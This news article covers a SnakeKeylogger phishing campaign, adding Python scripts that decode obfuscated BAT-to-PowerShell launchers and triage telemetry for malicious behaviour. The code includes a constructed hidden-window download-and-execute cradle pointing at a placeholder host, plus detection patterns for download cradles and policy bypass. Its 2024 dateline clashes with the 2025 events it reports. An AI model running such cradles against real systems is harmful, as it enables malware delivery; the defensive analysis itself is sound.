Tuesday, 02 January 2024 12:17 GMT

SnakeKeylogger Surfaces With New Email-to-PowerShell Attack Chain


(MENAFN - The Arabian Post)

A fresh campaign deploying SnakeKeylogger is targeting users with weaponized emails that lead to the execution of PowerShell scripts and ultimately exfiltrate sensitive data. Security analysts warn that the threat now blends social engineering with native Windows scripting to evade detection.

Emails purporting to be from “CPA-Payment Files” or similar remittance services carry attachments, most often ISO or ZIP files. Once opened, these contain a malicious BAT file that launches PowerShell commands to fetch a secondary payload. That payload is the SnakeKeylogger executable, which then installs itself, harvests data and communicates with its command and control servers. The malware captures keystrokes, browser credentials, system metadata, and cookies before transmitting encrypted logs.
This attack chain was first observed on 7 October 2025, when several recipients reported emails titled “remittance advice for the payment dated 07-Oct-2025”. The attackers rely on both obfuscation and native scripting to stay under the radar.

Earlier iterations of SnakeKeylogger have been delivered through phishing campaigns that use Excel or HTA files. In one such campaign, Fortinet researchers documented how an Excel attachment exploited CVE-2017-0199, the Microsoft Office OLE remote code execution flaw, to drop a PowerShell loader, which in turn deployed the keylogger. That version already sought to steal browser-saved credentials, clipboard contents, and keystroke data.
Over time, the malware evolved: later variants introduced persistence via scheduled tasks, registry run keys, or blending with system processes to mask their presence. In some campaigns, attackers impersonated defence contractors to lend legitimacy to their email lures.

The current campaign adds two noteworthy refinements: first, the use of ISO and ZIP containers to bypass email filters that block Office documents; second, the invocation of PowerShell via obfuscated BAT scripts to reduce forensic footprints. Analysts trace much of the attack logic to embedded Base64 strings decoded at runtime to build download URLs and commands. Once the loader is in place, it stages SnakeKeylogger inside trusted processes to avoid triggering heuristics tied to newly spawned binaries.
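As an added illustration, and not code from the campaign or from any vendor cited here, the following Python script shows how an analyst peels such a launcher: it strips cmd.exe caret obfuscation, decodes the UTF-16LE Base64 behind -EncodedCommand, decodes any Base64 literal passed to FromBase64String, and collects the URLs that emerge. The BAT sample it works on is constructed inside the script and points at a reserved .invalid domain; the switches and download-cradle pattern it uses are common PowerShell idioms, not indicators taken from this campaign.

```python
"""Peel the layers of an obfuscated BAT -> PowerShell launcher.

Added example for analysts triaging a suspected lure; it is not code from the
campaign or from any vendor report. The sample it decodes is constructed here,
with a URL on the reserved .invalid TLD, so nothing in it is a real indicator.
"""
from __future__ import annotations

import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" and confirm it is a prefix of the full switch name later.
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
# Inline blobs decoded at runtime, the pattern the article attributes to the loader.
INLINE_B64_RE = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s'\"<>)]+")


def b64_to_text(blob: str, encoding: str | None = None) -> str | None:
    """Decode Base64 to text; pick UTF-16LE vs UTF-8 from the byte layout when not told."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    if encoding is None:
        # UTF-16LE ASCII text has a NUL in every odd position; UTF-8 text has (almost) none.
        encoding = "utf-16-le" if raw and raw[1::2].count(0) > len(raw) // 4 else "utf-8"
    try:
        return raw.decode(encoding)
    except UnicodeDecodeError:
        return None


def decode_encoded_commands(text: str) -> list[str]:
    """Return the script behind every -EncodedCommand (UTF-16LE Base64) in `text`."""
    found = []
    for m in ENC_FLAG_RE.finditer(text):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):  # e.g. -ExecutionPolicy is not it
            continue
        decoded = b64_to_text(blob, "utf-16-le")
        if decoded:
            found.append(decoded)
    return found


def decode_inline_blobs(text: str) -> list[str]:
    """Return the plaintext of every [Convert]::FromBase64String('...') literal."""
    return [d for d in (b64_to_text(m.group(1)) for m in INLINE_B64_RE.finditer(text)) if d]


def analyze(text: str, max_depth: int = 4) -> dict:
    """Strip cmd.exe carets, then decode Base64 layers breadth-first and collect URLs."""
    layers: list[str] = []
    urls: set[str] = set()
    seen: set[str] = set()
    frontier = [text.replace("^", "")]  # ^ is cmd's escape char: pow^ers^hell == powershell
    for _ in range(max_depth):
        nxt: list[str] = []
        for chunk in frontier:
            if chunk in seen:
                continue
            seen.add(chunk)
            layers.append(chunk)
            urls.update(URL_RE.findall(chunk))
            nxt += decode_encoded_commands(chunk) + decode_inline_blobs(chunk)
        if not nxt:
            break
        frontier = nxt
    return {"layers": layers, "urls": sorted(urls)}


def build_sample_bat() -> str:
    """Constructed stand-in for the lure's BAT file (not a real sample).

    A caret-obfuscated powershell call with an encoded download cradle whose URL is
    itself Base64 inside the script, mirroring the two-stage decoding described above.
    """
    url_b64 = base64.b64encode(b"http://example.invalid/load.txt").decode()
    script = (
        "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{0}'));"
        "IEX (New-Object Net.WebClient).DownloadString($u)"
    ).format(url_b64)
    enc = base64.b64encode(script.encode("utf-16-le")).decode()
    return "@echo off\r\npow^ers^hell -nop -w hidden -enc {0}\r\n".format(enc)


if __name__ == "__main__":
    result = analyze(build_sample_bat())
    for i, layer in enumerate(result["layers"]):
        print(f"layer {i}: {layer[:80]}{'...' if len(layer) > 80 else ''}")
    print("URLs to block or hunt for:", result["urls"])
```

Running the script prints three layers (the caret-stripped BAT line, the decoded PowerShell cradle, and the URL it would fetch) followed by the URL list; the same functions can be pointed at command lines pulled from process-creation telemetry. Environment-variable substitution in BAT files is not handled here and would need a small cmd.exe emulator.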


Exfiltration occurs through HTTP POST requests disguised as legitimate telemetry to PHP endpoints on attacker-controlled domains. To evade network defenders, exfiltration intervals are randomized and stolen data is queued locally for later retry if the C2 endpoint is unavailable. The collected data is encrypted with AES-256-GCM using a key derived from the machine's GUID and a salt; that hides the content from network inspection, but an analyst holding the sample and the host's GUID can in principle reproduce the key, so captured logs are not beyond recovery during an investigation.

Defence recommendations from cybersecurity firms include enforcing stringent email content filters that also cover ISO and archive attachments, constraining PowerShell execution policies (with the caveat that execution policy is a safety feature rather than a security boundary, since a launcher can pass -ExecutionPolicy Bypass or feed an encoded command), and activating script block logging so that decoded script content is recorded. Endpoint protection tools should monitor registry changes, command-line invocations, and anomalous network traffic, particularly POST requests to domains not tied to legitimate corporate services.
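As an added example, and not detection content from any of the firms referred to above, the following Python triage script applies those three monitoring recommendations to constructed Sysmon-style records: it flags PowerShell spawned from cmd.exe with encoded, hidden-window or download-cradle switches, Run-key writes that point into user-writable folders, and HTTP POSTs to hosts outside an allowlist. The events, hostnames, paths and the allowlist are all placeholders (reserved .example names) to be replaced with an organisation's own data.

```python
"""Triage Sysmon-style telemetry for the behaviours the article recommends watching.

Added example, not detection content from any vendor named in the article. The
events and the allowlist are constructed placeholders (reserved .example names).
"""
from __future__ import annotations

import ntpath
import re

# Placeholder allowlist: replace with the organisation's real SaaS and corporate domains.
ALLOWED_HOSTS = {"intranet.corp.example", "login.microsoftonline.com"}
# Script hosts that a BAT/VBS/HTA lure would use to spawn PowerShell.
SCRIPT_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

PS_INDICATORS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}"),
    "hidden_window":   re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "no_profile":      re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "policy_bypass":   re.compile(r"(?i)(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass\b"),
    "download_cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                                  r"|net\.webclient|invoke-expression|\biex\b"),
}
RUN_KEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\\")
USER_WRITABLE_RE = re.compile(r"(?i)\\(?:AppData|Temp|Tmp|ProgramData|Downloads|Public)\\")

# Constructed telemetry in Sysmon-like fields (not real logs). The chain mirrors the article:
# a .bat from a mounted ISO runs PowerShell, persistence is set, then a POST leaves the host.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "E:\Remittance_Advice.bat"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -nop -w hidden -enc QQBCAEMA"},  # blob is UTF-16LE "ABC", a placeholder
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\Inventory.ps1"},  # benign admin use
    {"type": "registry", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\finance\AppData\Roaming\upd.exe"},
    {"type": "http", "method": "POST", "host": "telemetry-sync.example", "path": "/gate.php",
     "process": r"C:\Users\finance\AppData\Roaming\upd.exe"},
    {"type": "http", "method": "POST", "host": "login.microsoftonline.com", "path": "/common/oauth2/v2.0/token",
     "process": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()  # ntpath splits on backslashes on any OS


def check_process(ev: dict) -> dict | None:
    """PowerShell launched by a script host, or carrying two or more suspicious switches."""
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    hits = [name for name, rx in PS_INDICATORS.items() if rx.search(ev["cmdline"])]
    parent = basename(ev["parent"])
    if (parent in SCRIPT_PARENTS and hits) or len(hits) >= 2:
        return {"rule": "suspicious_powershell", "parent": parent, "indicators": hits,
                "cmdline": ev["cmdline"]}
    return None


def check_registry(ev: dict) -> dict | None:
    """Run/RunOnce value whose data points into a user-writable folder (user-level persistence)."""
    if RUN_KEY_RE.search(ev["target"]) and USER_WRITABLE_RE.search(ev["details"]):
        return {"rule": "run_key_persistence", "target": ev["target"], "details": ev["details"]}
    return None


def host_allowed(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ALLOWED_HOSTS)


def check_http(ev: dict) -> dict | None:
    """POST to a host outside the allowlist; note PHP endpoints and odd client binaries."""
    if ev["method"].upper() != "POST" or host_allowed(ev["host"]):
        return None
    notes = []
    if ev["path"].lower().endswith(".php"):
        notes.append("php endpoint")
    if USER_WRITABLE_RE.search(ev["process"]):
        notes.append("client runs from user-writable path")
    return {"rule": "unlisted_post", "host": ev["host"], "path": ev["path"], "notes": notes}


CHECKS = {"process": check_process, "registry": check_registry, "http": check_http}


def triage(events: list[dict]) -> list[dict]:
    alerts = []
    for ev in events:
        check = CHECKS.get(ev["type"])
        alert = check(ev) if check else None
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

On the constructed records the script raises exactly three alerts, one per stage of the chain, and stays silent on the benign PowerShell invocation and the POST to an allowlisted identity provider. Allowlist matching is by domain suffix, so a lookalike such as login.microsoftonline.com.evil.example is still flagged.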


MENAFN12102025000152002308ID1110183503


